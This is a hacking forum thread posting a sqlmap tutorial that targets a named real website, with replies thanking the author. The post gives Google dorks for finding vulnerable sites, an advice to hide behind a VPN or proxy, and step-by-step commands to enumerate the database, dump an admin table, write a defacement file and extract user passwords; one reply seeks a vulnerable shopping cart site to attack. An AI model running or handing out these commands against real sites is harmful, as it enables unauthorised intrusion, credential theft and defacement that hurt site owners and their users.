Sqlmap Tutorial
Hello All Members! :)
Injection Tool: sqlmap Official Page: http://sqlmap.org Download Link: https://github.com/sqlmapproject/sqlmap/zipball/master Testing: WIndows XP/SP3 , Python 2.7.5 vulnerability Page: http://www.godwins-law.co.uk/staff.php?id=10' !!!!! Use OpenVPN OR PROXY !!!!! Step1. Target Google Dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc... Target: http://www.godwins-law.co.uk/staff.php?id=10 Target WebServer Operating System: WIndows 2003 Target WebApplication: ASP.NET , Microsoft IIS 6.0 , PHP 5.2.8 Target BackEndDataBase: MySQL 5.0.0 Step2. DataBase sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs --database-- godwins information_schema Step3. Table sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins --tables --table-- adminhelp articlecats articles contentimages imagelib news pages staff Step4. Column & Dump sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --columns sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --dump Step5. Hacked Text sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=Hacked_By_sasami_327.txt sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=Hacked_By_sasami_327.txt Step6. user & password sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords |
nice tut
|
nice tut thanks
|
Thanks
|
all i need is vulnerable shopping cart site in my country now.
Thanks |
thanks!!
|
where is adminhelp table?
|
All times are GMT. The time now is 12:54 PM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
vB.Sponsors